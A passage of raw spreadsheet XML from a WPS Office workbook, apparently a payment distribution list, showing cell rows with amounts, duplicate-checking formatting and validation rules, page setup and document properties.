      <c r="WXJ2648" s="8"/>
      <c r="WXK2648" s="8"/>
      <c r="WXL2648" s="8"/>
      <c r="WXM2648" s="8"/>
      <c r="WXN2648" s="8"/>
      <c r="WXO2648" s="8"/>
      <c r="WXP2648" s="8"/>
      <c r="WXQ2648" s="8"/>
      <c r="WXR2648" s="8"/>
      <c r="WXS2648" s="8"/>
      <c r="WXT2648" s="8"/>
      <c r="WXU2648" s="8"/>
      <c r="WXV2648" s="8"/>
      <c r="WXW2648" s="8"/>
      <c r="WXX2648" s="8"/>
      <c r="WXY2648" s="8"/>
      <c r="WXZ2648" s="8"/>
      <c r="WYA2648" s="8"/>
      <c r="WYB2648" s="8"/>
      <c r="WYC2648" s="8"/>
      <c r="WYD2648" s="8"/>
      <c r="WYE2648" s="8"/>
      <c r="WYF2648" s="8"/>
      <c r="WYG2648" s="8"/>
      <c r="WYH2648" s="8"/>
      <c r="WYI2648" s="8"/>
      <c r="WYJ2648" s="8"/>
      <c r="WYK2648" s="8"/>
      <c r="WYL2648" s="8"/>
      <c r="WYM2648" s="8"/>
      <c r="WYN2648" s="8"/>
      <c r="WYO2648" s="8"/>
      <c r="WYP2648" s="8"/>
      <c r="WYQ2648" s="8"/>
      <c r="WYR2648" s="8"/>
      <c r="WYS2648" s="8"/>
      <c r="WYT2648" s="8"/>
      <c r="WYU2648" s="8"/>
      <c r="WYV2648" s="8"/>
      <c r="WYW2648" s="8"/>
      <c r="WYX2648" s="8"/>
      <c r="WYY2648" s="8"/>
      <c r="WYZ2648" s="8"/>
      <c r="WZA2648" s="8"/>
      <c r="WZB2648" s="8"/>
      <c r="WZC2648" s="8"/>
      <c r="WZD2648" s="8"/>
      <c r="WZE2648" s="8"/>
      <c r="WZF2648" s="8"/>
      <c r="WZG2648" s="8"/>
      <c r="WZH2648" s="8"/>
      <c r="WZI2648" s="8"/>
      <c r="WZJ2648" s="8"/>
      <c r="WZK2648" s="8"/>
      <c r="WZL2648" s="8"/>
      <c r="WZM2648" s="8"/>
      <c r="WZN2648" s="8"/>
      <c r="WZO2648" s="8"/>
      <c r="WZP2648" s="8"/>
      <c r="WZQ2648" s="8"/>
      <c r="WZR2648" s="8"/>
      <c r="WZS2648" s="8"/>
      <c r="WZT2648" s="8"/>
      <c r="WZU2648" s="8"/>
      <c r="WZV2648" s="8"/>
      <c r="WZW2648" s="8"/>
      <c r="WZX2648" s="8"/>
      <c r="WZY2648" s="8"/>
      <c r="WZZ2648" s="8"/>
      <c r="XAA2648" s="8"/>
      <c r="XAB2648" s="8"/>
      <c r="XAC2648" s="8"/>
      <c r="XAD2648" s="8"/>
      <c r="XAE2648" s="8"/>
      <c r="XAF2648" s="8"/>
      <c r="XAG2648" s="8"/>
      <c r="XAH2648" s="8"/>
      <c r="XAI2648" s="8"/>
      <c r="XAJ2648" s="8"/>
      <c r="XAK2648" s="8"/>
      <c r="XAL2648" s="8"/>
      <c r="XAM2648" s="8"/>
      <c r="XAN2648" s="8"/>
      <c r="XAO2648" s="8"/>
      <c r="XAP2648" s="8"/>
      <c r="XAQ2648" s="8"/>
      <c r="XAR2648" s="8"/>
      <c r="XAS2648" s="8"/>
      <c r="XAT2648" s="8"/>
      <c r="XAU2648" s="8"/>
      <c r="XAV2648" s="8"/>
      <c r="XAW2648" s="8"/>
      <c r="XAX2648" s="8"/>
      <c r="XAY2648" s="8"/>
      <c r="XAZ2648" s="8"/>
      <c r="XBA2648" s="8"/>
      <c r="XBB2648" s="8"/>
      <c r="XBC2648" s="8"/>
      <c r="XBD2648" s="8"/>
      <c r="XBE2648" s="8"/>
      <c r="XBF2648" s="8"/>
      <c r="XBG2648" s="8"/>
      <c r="XBH2648" s="8"/>
      <c r="XBI2648" s="8"/>
      <c r="XBJ2648" s="8"/>
      <c r="XBK2648" s="8"/>
      <c r="XBL2648" s="8"/>
      <c r="XBM2648" s="8"/>
      <c r="XBN2648" s="8"/>
      <c r="XBO2648" s="8"/>
      <c r="XBP2648" s="8"/>
      <c r="XBQ2648" s="8"/>
      <c r="XBR2648" s="8"/>
      <c r="XBS2648" s="8"/>
      <c r="XBT2648" s="8"/>
      <c r="XBU2648" s="8"/>
      <c r="XBV2648" s="8"/>
      <c r="XBW2648" s="8"/>
      <c r="XBX2648" s="8"/>
      <c r="XBY2648" s="8"/>
      <c r="XBZ2648" s="8"/>
      <c r="XCA2648" s="8"/>
      <c r="XCB2648" s="8"/>
      <c r="XCC2648" s="8"/>
      <c r="XCD2648" s="8"/>
      <c r="XCE2648" s="8"/>
      <c r="XCF2648" s="8"/>
      <c r="XCG2648" s="8"/>
      <c r="XCH2648" s="8"/>
      <c r="XCI2648" s="8"/>
      <c r="XCJ2648" s="8"/>
      <c r="XCK2648" s="8"/>
      <c r="XCL2648" s="8"/>
      <c r="XCM2648" s="8"/>
      <c r="XCN2648" s="8"/>
      <c r="XCO2648" s="8"/>
      <c r="XCP2648" s="8"/>
      <c r="XCQ2648" s="8"/>
      <c r="XCR2648" s="8"/>
      <c r="XCS2648" s="8"/>
      <c r="XCT2648" s="8"/>
      <c r="XCU2648" s="8"/>
      <c r="XCV2648" s="8"/>
      <c r="XCW2648" s="8"/>
      <c r="XCX2648" s="8"/>
      <c r="XCY2648" s="8"/>
      <c r="XCZ2648" s="8"/>
      <c r="XDA2648" s="8"/>
      <c r="XDB2648" s="8"/>
      <c r="XDC2648" s="8"/>
      <c r="XDD2648" s="8"/>
      <c r="XDE2648" s="8"/>
      <c r="XDF2648" s="8"/>
      <c r="XDG2648" s="8"/>
      <c r="XDH2648" s="8"/>
      <c r="XDI2648" s="8"/>
      <c r="XDJ2648" s="8"/>
      <c r="XDK2648" s="8"/>
      <c r="XDL2648" s="8"/>
      <c r="XDM2648" s="8"/>
      <c r="XDN2648" s="8"/>
      <c r="XDO2648" s="8"/>
      <c r="XDP2648" s="8"/>
      <c r="XDQ2648" s="8"/>
      <c r="XDR2648" s="8"/>
      <c r="XDS2648" s="8"/>
      <c r="XDT2648" s="8"/>
      <c r="XDU2648" s="8"/>
      <c r="XDV2648" s="8"/>
      <c r="XDW2648" s="8"/>
      <c r="XDX2648" s="8"/>
      <c r="XDY2648" s="8"/>
      <c r="XDZ2648" s="8"/>
      <c r="XEA2648" s="8"/>
      <c r="XEB2648" s="8"/>
      <c r="XEC2648" s="8"/>
      <c r="XED2648" s="8"/>
      <c r="XEE2648" s="8"/>
      <c r="XEF2648" s="8"/>
      <c r="XEG2648" s="8"/>
      <c r="XEH2648" s="8"/>
    </row>
    <row r="2649" ht="23" customHeight="1" spans="1:1024 1025:16362">
      <c r="A2649" s="16" t="s">
        <v>7003</v>
      </c>
      <c r="B2649" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C2649" s="110" t="s">
        <v>4701</v>
      </c>
      <c r="D2649" s="111" t="s">
        <v>7004</v>
      </c>
      <c r="E2649" s="112" t="s">
        <v>4114</v>
      </c>
      <c r="F2649" s="113" t="s">
        <v>3564</v>
      </c>
      <c r="G2649" s="109">
        <v>1</v>
      </c>
      <c r="H2649" s="109">
        <v>365</v>
      </c>
      <c r="I2649" s="114">
        <f t="shared" si="130"/>
        <v>365</v>
      </c>
      <c r="J2649" s="108" t="s">
        <v>5887</v>
      </c>
      <c r="K2649" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2650" ht="23" customHeight="1" spans="1:1024 1025:16362">
      <c r="A2650" s="16" t="s">
        <v>7005</v>
      </c>
      <c r="B2650" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C2650" s="115" t="s">
        <v>7006</v>
      </c>
      <c r="D2650" s="111" t="s">
        <v>7007</v>
      </c>
      <c r="E2650" s="111" t="s">
        <v>4159</v>
      </c>
      <c r="F2650" s="111" t="s">
        <v>3676</v>
      </c>
      <c r="G2650" s="116">
        <v>2</v>
      </c>
      <c r="H2650" s="111">
        <v>325</v>
      </c>
      <c r="I2650" s="114">
        <f t="shared" ref="I2650:I2656" si="131">H2650*G2650</f>
        <v>650</v>
      </c>
      <c r="J2650" s="108" t="s">
        <v>5887</v>
      </c>
      <c r="K2650" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2651" ht="23" customHeight="1" spans="1:1024 1025:16362">
      <c r="A2651" s="16" t="s">
        <v>7008</v>
      </c>
      <c r="B2651" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C2651" s="115" t="s">
        <v>7006</v>
      </c>
      <c r="D2651" s="111" t="s">
        <v>7009</v>
      </c>
      <c r="E2651" s="111" t="s">
        <v>7010</v>
      </c>
      <c r="F2651" s="111" t="s">
        <v>3676</v>
      </c>
      <c r="G2651" s="111"/>
      <c r="H2651" s="111"/>
      <c r="I2651" s="114"/>
      <c r="J2651" s="108" t="s">
        <v>5887</v>
      </c>
      <c r="K2651" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2652" ht="23" customHeight="1" spans="1:1024 1025:16362">
      <c r="A2652" s="16" t="s">
        <v>7011</v>
      </c>
      <c r="B2652" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C2652" s="117" t="s">
        <v>7012</v>
      </c>
      <c r="D2652" s="118" t="s">
        <v>7013</v>
      </c>
      <c r="E2652" s="118" t="s">
        <v>7014</v>
      </c>
      <c r="F2652" s="34" t="s">
        <v>3584</v>
      </c>
      <c r="G2652" s="119">
        <v>1</v>
      </c>
      <c r="H2652" s="119">
        <v>365</v>
      </c>
      <c r="I2652" s="114">
        <f t="shared" si="131"/>
        <v>365</v>
      </c>
      <c r="J2652" s="108" t="s">
        <v>5887</v>
      </c>
      <c r="K2652" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L2652" s="10"/>
    </row>
    <row r="2653" ht="23" customHeight="1" spans="1:1024 1025:16362">
      <c r="A2653" s="16" t="s">
        <v>7015</v>
      </c>
      <c r="B2653" s="109" t="s">
        <v>6343</v>
      </c>
      <c r="C2653" s="109" t="s">
        <v>6529</v>
      </c>
      <c r="D2653" s="86" t="s">
        <v>7016</v>
      </c>
      <c r="E2653" s="90" t="s">
        <v>7017</v>
      </c>
      <c r="F2653" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2653" s="109">
        <v>1</v>
      </c>
      <c r="H2653" s="109">
        <v>365</v>
      </c>
      <c r="I2653" s="114">
        <f t="shared" si="131"/>
        <v>365</v>
      </c>
      <c r="J2653" s="108" t="s">
        <v>5887</v>
      </c>
      <c r="K2653" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L2653" s="1"/>
      <c r="M2653" s="10"/>
      <c r="N2653" s="10"/>
      <c r="O2653" s="10"/>
      <c r="P2653" s="10"/>
      <c r="Q2653" s="10"/>
      <c r="R2653" s="10"/>
      <c r="S2653" s="10"/>
      <c r="T2653" s="10"/>
      <c r="U2653" s="10"/>
      <c r="V2653" s="10"/>
    </row>
    <row r="2654" s="10" customFormat="1" ht="23" customHeight="1" spans="1:1024 1025:16362">
      <c r="A2654" s="16" t="s">
        <v>7018</v>
      </c>
      <c r="B2654" s="87" t="s">
        <v>3206</v>
      </c>
      <c r="C2654" s="103" t="s">
        <v>7019</v>
      </c>
      <c r="D2654" s="85" t="s">
        <v>7020</v>
      </c>
      <c r="E2654" s="113" t="s">
        <v>3239</v>
      </c>
      <c r="F2654" s="122" t="s">
        <v>7021</v>
      </c>
      <c r="G2654" s="85">
        <v>1</v>
      </c>
      <c r="H2654" s="85">
        <v>365</v>
      </c>
      <c r="I2654" s="114">
        <f t="shared" si="131"/>
        <v>365</v>
      </c>
      <c r="J2654" s="108" t="s">
        <v>5887</v>
      </c>
      <c r="K2654" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L2654" s="1"/>
      <c r="M2654" s="1"/>
      <c r="N2654" s="1"/>
      <c r="O2654" s="1"/>
      <c r="P2654" s="1"/>
      <c r="Q2654" s="1"/>
      <c r="R2654" s="1"/>
      <c r="S2654" s="1"/>
      <c r="T2654" s="1"/>
      <c r="U2654" s="1"/>
      <c r="V2654" s="1"/>
      <c r="GO2654" s="120"/>
    </row>
    <row r="2655" s="1" customFormat="1" ht="23" customHeight="1" spans="1:1024 1025:16362">
      <c r="A2655" s="16" t="s">
        <v>7022</v>
      </c>
      <c r="B2655" s="21" t="s">
        <v>219</v>
      </c>
      <c r="C2655" s="20" t="s">
        <v>7023</v>
      </c>
      <c r="D2655" s="20" t="s">
        <v>7024</v>
      </c>
      <c r="E2655" s="20" t="s">
        <v>265</v>
      </c>
      <c r="F2655" s="20" t="s">
        <v>233</v>
      </c>
      <c r="G2655" s="85">
        <v>1</v>
      </c>
      <c r="H2655" s="85">
        <v>365</v>
      </c>
      <c r="I2655" s="114">
        <f t="shared" si="131"/>
        <v>365</v>
      </c>
      <c r="J2655" s="108" t="s">
        <v>5887</v>
      </c>
      <c r="K2655" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L2655" s="6"/>
    </row>
    <row r="2656" s="1" customFormat="1" ht="23" customHeight="1" spans="1:1024 1025:16362">
      <c r="A2656" s="16" t="s">
        <v>7025</v>
      </c>
      <c r="B2656" s="21" t="s">
        <v>219</v>
      </c>
      <c r="C2656" s="20" t="s">
        <v>7026</v>
      </c>
      <c r="D2656" s="20" t="s">
        <v>7027</v>
      </c>
      <c r="E2656" s="20" t="s">
        <v>521</v>
      </c>
      <c r="F2656" s="20" t="s">
        <v>233</v>
      </c>
      <c r="G2656" s="85">
        <v>1</v>
      </c>
      <c r="H2656" s="85">
        <v>365</v>
      </c>
      <c r="I2656" s="114">
        <f t="shared" si="131"/>
        <v>365</v>
      </c>
      <c r="J2656" s="108" t="s">
        <v>5887</v>
      </c>
      <c r="K2656" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L2656" s="6"/>
      <c r="M2656" s="6"/>
      <c r="N2656" s="6"/>
      <c r="O2656" s="6"/>
      <c r="P2656" s="6"/>
      <c r="Q2656" s="6"/>
      <c r="R2656" s="6"/>
      <c r="S2656" s="6"/>
      <c r="T2656" s="6"/>
      <c r="U2656" s="6"/>
      <c r="V2656" s="6"/>
    </row>
    <row r="2657" ht="23" customHeight="1" spans="7:9">
      <c r="G2657" s="8">
        <f>SUM(G3:G2656)</f>
        <v>2654</v>
      </c>
      <c r="I2657" s="8">
        <f>SUM(I3:I2656)</f>
        <v>925460</v>
      </c>
    </row>
  </sheetData>
  <autoFilter xmlns:etc="http://www.wps.cn/officeDocument/2017/etCustomData" ref="A2:XEH2657" etc:filterBottomFollowUsedRange="0">
    <extLst/>
  </autoFilter>
  <mergeCells count="1">
    <mergeCell ref="A1:K1"/>
  </mergeCells>
  <conditionalFormatting sqref="F1121">
    <cfRule type="duplicateValues" dxfId="0" priority="61"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="F1122">
    <cfRule type="duplicateValues" dxfId="0" priority="60"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="F1124">
    <cfRule type="duplicateValues" dxfId="0" priority="51"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="F1125">
    <cfRule type="duplicateValues" dxfId="0" priority="50"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="D1133">
    <cfRule type="expression" dxfId="1" priority="35">
      <formula>AND(SUMPRODUCT(IFERROR(1*(($D$1133&amp;"x")=(D1133&amp;"x")),0))&gt;1,NOT(ISBLANK(D1133)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F1133">
    <cfRule type="duplicateValues" dxfId="0" priority="45"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="D1495">
    <cfRule type="duplicateValues" dxfId="0" priority="150" stopIfTrue="1"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="D1600">
    <cfRule type="duplicateValues" dxfId="0" priority="151" stopIfTrue="1"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="D1723">
    <cfRule type="duplicateValues" dxfId="0" priority="80" stopIfTrue="1"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="D1727">
    <cfRule type="duplicateValues" dxfId="0" priority="113" stopIfTrue="1"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="D1733">
    <cfRule type="duplicateValues" dxfId="0" priority="79" stopIfTrue="1"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="D2524">
    <cfRule type="duplicateValues" dxfId="0" priority="116"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E2643">
    <cfRule type="duplicateValues" dxfId="0" priority="7"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E2645">
    <cfRule type="expression" dxfId="1" priority="5">
      <formula>AND(SUMPRODUCT(IFERROR(1*(($E$2645&amp;"x")=(E2645&amp;"x")),0))&gt;1,NOT(ISBLANK(E2645)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E2649">
    <cfRule type="duplicateValues" dxfId="0" priority="4"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="F1150:F1151">
    <cfRule type="duplicateValues" dxfId="0" priority="31"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="F1162:F1163">
    <cfRule type="expression" dxfId="1" priority="28">
      <formula>AND(SUMPRODUCT(IFERROR(1*(($F$1162:$F$1163&amp;"x")=(F1162&amp;"x")),0))&gt;1,NOT(ISBLANK(F1162)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E2:E2239 E2242:E2639">
    <cfRule type="expression" dxfId="1" priority="234">
      <formula>AND(SUMPRODUCT(IFERROR(1*(($E$2:$E$2239&amp;"x")=(E2&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$2242:$E$2639&amp;"x")=(E2&amp;"x")),0))&gt;1,NOT(ISBLANK(E2)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F1132 F1134">
    <cfRule type="duplicateValues" dxfId="0" priority="49"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="C1138:C1139 C1149:C1157 C1141">
    <cfRule type="expression" dxfId="1" priority="40">
      <formula>AND(SUMPRODUCT(IFERROR(1*(($C$1138:$C$1139&amp;"x")=(C1138&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($C$1149:$C$1157&amp;"x")=(C1138&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($C$1141&amp;"x")=(C1138&amp;"x")),0))&gt;1,NOT(ISBLANK(C1138)))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="5">
    <dataValidation allowBlank="1" sqref="E762 E826 E902 E924 E968 E1123 E1160 E1165 D1323:E1323 E1894 E1125:E1128 E1130:E1132 E1135:E1138 E1140:E1141 E1149:E1150 E1152:E1157"/>
    <dataValidation type="custom" allowBlank="1" showErrorMessage="1" errorTitle="拒绝重复输入" error="当前输入的内容，与本区域的其他单元格内容重复。" sqref="E787 E1010 E1012 E1050 E1063 E1069 E1075 E1092 E1106 E1297 E1022:E1023 E1284:E1285 E1301:E1303">
      <formula1>COUNTIF(#REF!,E787)&lt;2</formula1>
    </dataValidation>
    <dataValidation type="custom" allowBlank="1" showErrorMessage="1" errorTitle="拒绝重复输入" error="当前输入的内容，与本区域的其他单元格内容重复。" sqref="E1279 E2511 E2611 E2613 E1286:E1287 E2544:E2551" errorStyle="warning">
      <formula1>COUNTIF(#REF!,E1279)&lt;2</formula1>
    </dataValidation>
    <dataValidation type="custom" allowBlank="1" showErrorMessage="1" errorTitle="拒绝重复输入" error="当前输入的内容，与本区域的其他单元格内容重复。" sqref="E2263 E2266" errorStyle="warning">
      <formula1>COUNTIF($H:$H,E2263)&lt;2</formula1>
    </dataValidation>
    <dataValidation type="custom" allowBlank="1" showErrorMessage="1" errorTitle="拒绝重复输入" error="当前输入的内容，与本区域的其他单元格内容重复。" sqref="E2631">
      <formula1>COUNTIF($E:$E,E2631)&lt;2</formula1>
    </dataValidation>
  </dataValidations>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.747916666666667" right="0.747916666666667" top="0.984027777777778" bottom="0.984027777777778" header="0.510416666666667" footer="0.510416666666667"/>
  <pageSetup paperSize="9" scale="75" firstPageNumber="4294963191" orientation="landscape" useFirstPageNumber="1" horizontalDpi="180" verticalDpi="180"/>
  <headerFooter alignWithMargins="0"/>
</worksheet>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Application>WPS Office 个人版</Application>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>工作表</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="2" baseType="lpstr">
      <vt:lpstr>Recovered_Sheet1</vt:lpstr>
      <vt:lpstr>发放明细表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dc:creator>
  <cp:lastModifiedBy>孤岛</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2004-11-24T00:28:00Z</dcterms:created>
  <cp:lastPrinted>2019-01-30T08:27:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-09T00:39:47Z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2052-12.1.0.24034</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOReadingLayout">
    <vt:bool>true</vt:bool>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>83CDCF8DE34140C28BFEF10AD34543FE</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="CalculationRule">
    <vt:i4>0</vt:i4>
  </property>
</Properties>
</file>